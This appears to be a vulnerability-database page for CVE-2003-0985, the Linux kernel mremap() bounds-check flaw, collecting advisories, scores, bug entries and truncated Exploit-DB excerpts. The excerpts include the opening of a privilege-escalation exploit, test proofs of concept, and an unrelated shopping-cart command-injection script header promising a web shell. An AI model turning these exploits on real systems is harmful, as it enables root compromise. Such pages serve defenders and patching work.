CVE-2003-0985
published 2004-01-20CVE-2003-0985: The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks…
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.23%
65.3th percentile
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
Affected
24 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p4qr-c64v-fjhc: The mremap system call (do_mremap) in Linux kernel 2
ghsa_unreviewed·2022-05-03
CVE-2003-0985 [HIGH] GHSA-p4qr-c64v-fjhc: The mremap system call (do_mremap) in Linux kernel 2
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
Red Hat
security flaw
vendor_redhat·2004-02-18·CVSS 7.2
CVE-2004-0077 [HIGH] security flaw
security flaw
The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.
Red Hat
security flaw
vendor_redhat·2004-01-05·CVSS 7.2
CVE-2003-0985 [HIGH] security flaw
security flaw
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
No detection rules found.
Exploit-DB
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator
exploitdb·2004-02-18·CVSS 7.2
CVE-2004-0077 [HIGH] Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator
---
/*
* Proof-of-concept exploit code for do_mremap() #2
*
* EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1".
* EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/
*
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied
Exploit-DB
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
exploitdb·2004-01-15
CVE-2003-0985 Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation
---
/*
* Linux kernel mremap() bound checking bug exploit.
*
* Bug found by Paul Starzetz
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define str(s) #s
#define xstr(s) str(s)
#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR 0x2000
#define
Exploit-DB
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (2)
exploitdb·2004-01-07
CVE-2003-0985 Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (2)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (2)
---
/*
* EDB Note: This will just "test" the vulnerability.
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/
/*
* Proof of concept code for testing do_mremap() Linux kernel bug.
* It is based on the code by Christophe Devine and Julien Tinnes
* posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since
* it avoids any kernel data corruption.
*
* The following test was done against the Linux kernel 2.6.0. Similar
* results were obtained against the kernel 2.4.23 and previous ones.
*
* buffer@mintaka:~$ gcc -o mremap_bug mremap_bug.c
* buffer@mintaka:~$ ./mremap_bug
*
* Base address : 0x60000000
*
* 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug
*
Exploit-DB
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)
exploitdb·2004-01-06
CVE-2003-0985 Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)
---
/*
* EDB Note: This will just "test" the vulnerability.
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/
/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General P
Exploit-DB
Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution
exploitdb·2001-09-08
CVE-2001-0985 Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution
Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution
---
source: https://www.securityfocus.com/bid/3308/info
Hassan Consulting's Shopping Cart is commercial web store software.
Shopping Cart does not filter certain types of user-supplied input from web requests. This makes it possible for a malicious user to submit a request which causes arbitrary commands to be executed on the host (with the privileges of the webserver process). For example, special shell characters like "|" or ";" are treated as valid by Shopping Cart.
#####################################################
# Shopcart exploit
# Spawn bash style Shell with webserver uid
#
# Spabam 2003 PRIV8 code
# #hackarena irc.brasnet.org
# This Script is currently under development
###################################
Bugzilla
CVE-2003-0985 security flaw
bugzilla·2018-08-16·CVSS 7.2
CVE-2003-0985 [HIGH] CVE-2003-0985 security flaw
CVE-2003-0985 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
Bugzilla
CVE-2004-0077 security flaw
bugzilla·2018-08-16·CVSS 7.2
CVE-2004-0077 [HIGH] CVE-2004-0077 security flaw
CVE-2004-0077 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.
Bugzilla
CAN-2003-0984 rtc leaks
bugzilla·2004-01-05
[MEDIUM] CAN-2003-0984 rtc leaks
CAN-2003-0984 rtc leaks
Description of problem:
Paul Starzetz discovered a flaw in bounds checking in mremap() in the
Linux kernel versions 2.4.23 and previous which may allow a local
attacker to gain root privileges. No exploit is currently available;
however, it is believed that this issue is exploitable (although not
trivially.)
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0985 to this issue.
Real time clock (RTC) routines in Linux kernel 2.4.23 and earlier do not properly initialize their structures, which could leak kernel data to user space.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0984 to this issue.
Additional info:
Red Hat Linux 7.x, 8 and 9 are already patched against
ftp://patches.sgi.com/support/free/security/advisories/20040102-01-Uhttp://archives.neohapsis.com/archives/bugtraq/2004-01/0070.htmlhttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000799http://download.immunix.org/ImmunixOS/7.3/updates/IMNX-2004-73-001-01http://isec.pl/vulnerabilities/isec-0013-mremap.txthttp://klecker.debian.org/~joey/security/kernel/patches/patch.CAN-2005-0528.mremaphttp://marc.info/?l=bugtraq&m=107332754521495&w=2http://marc.info/?l=bugtraq&m=107332782121916&w=2http://marc.info/?l=bugtraq&m=107340358402129&w=2http://marc.info/?l=bugtraq&m=107340814409017&w=2http://marc.info/?l=bugtraq&m=107350348418373&w=2http://marc.info/?l=bugtraq&m=107394143105081&w=2http://secunia.com/advisories/10532http://secunia.com/advisories/20163http://secunia.com/advisories/20202http://secunia.com/advisories/20338http://svn.debian.org/wsvn/kernel/patch-tracking/CVE-2005-0528?op=file&rev=0&sc=0http://www.ciac.org/ciac/bulletins/o-045.shtmlhttp://www.debian.org/security/2004/dsa-413http://www.debian.org/security/2004/dsa-417http://www.debian.org/security/2004/dsa-423http://www.debian.org/security/2004/dsa-427http://www.debian.org/security/2004/dsa-439http://www.debian.org/security/2004/dsa-440http://www.debian.org/security/2004/dsa-442http://www.debian.org/security/2004/dsa-450http://www.debian.org/security/2004/dsa-470http://www.debian.org/security/2004/dsa-475http://www.debian.org/security/2006/dsa-1067http://www.debian.org/security/2006/dsa-1069http://www.debian.org/security/2006/dsa-1070http://www.debian.org/security/2006/dsa-1082http://www.kb.cert.org/vuls/id/490620http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.24http://www.linuxsecurity.com/advisories/engarde_advisory-3904.htmlhttp://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:001http://www.novell.com/linux/security/advisories/2004_03_linux_kernel.htmlhttp://www.osvdb.org/3315http://www.redhat.com/support/errata/RHSA-2003-416.htmlhttp://www.redhat.com/support/errata/RHSA-2003-417.htmlhttp://www.redhat.com/support/errata/RHSA-2003-418.htmlhttp://www.redhat.com/support/errata/RHSA-2003-419.htmlhttp://www.securityfocus.com/bid/9356https://exchange.xforce.ibmcloud.com/vulnerabilities/14135https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A860https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A867ftp://patches.sgi.com/support/free/security/advisories/20040102-01-Uhttp://archives.neohapsis.com/archives/bugtraq/2004-01/0070.htmlhttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000799http://download.immunix.org/ImmunixOS/7.3/updates/IMNX-2004-73-001-01http://isec.pl/vulnerabilities/isec-0013-mremap.txthttp://klecker.debian.org/~joey/security/kernel/patches/patch.CAN-2005-0528.mremaphttp://marc.info/?l=bugtraq&m=107332754521495&w=2http://marc.info/?l=bugtraq&m=107332782121916&w=2http://marc.info/?l=bugtraq&m=107340358402129&w=2http://marc.info/?l=bugtraq&m=107340814409017&w=2http://marc.info/?l=bugtraq&m=107350348418373&w=2http://marc.info/?l=bugtraq&m=107394143105081&w=2http://secunia.com/advisories/10532http://secunia.com/advisories/20163http://secunia.com/advisories/20202http://secunia.com/advisories/20338http://svn.debian.org/wsvn/kernel/patch-tracking/CVE-2005-0528?op=file&rev=0&sc=0http://www.ciac.org/ciac/bulletins/o-045.shtmlhttp://www.debian.org/security/2004/dsa-413http://www.debian.org/security/2004/dsa-417http://www.debian.org/security/2004/dsa-423http://www.debian.org/security/2004/dsa-427http://www.debian.org/security/2004/dsa-439http://www.debian.org/security/2004/dsa-440http://www.debian.org/security/2004/dsa-442http://www.debian.org/security/2004/dsa-450http://www.debian.org/security/2004/dsa-470http://www.debian.org/security/2004/dsa-475http://www.debian.org/security/2006/dsa-1067http://www.debian.org/security/2006/dsa-1069http://www.debian.org/security/2006/dsa-1070http://www.debian.org/security/2006/dsa-1082http://www.kb.cert.org/vuls/id/490620http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.24http://www.linuxsecurity.com/advisories/engarde_advisory-3904.htmlhttp://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:001http://www.novell.com/linux/security/advisories/2004_03_linux_kernel.htmlhttp://www.osvdb.org/3315http://www.redhat.com/support/errata/RHSA-2003-416.htmlhttp://www.redhat.com/support/errata/RHSA-2003-417.htmlhttp://www.redhat.com/support/errata/RHSA-2003-418.htmlhttp://www.redhat.com/support/errata/RHSA-2003-419.htmlhttp://www.securityfocus.com/bid/9356https://exchange.xforce.ibmcloud.com/vulnerabilities/14135https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A860https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A867
2004-01-20
Published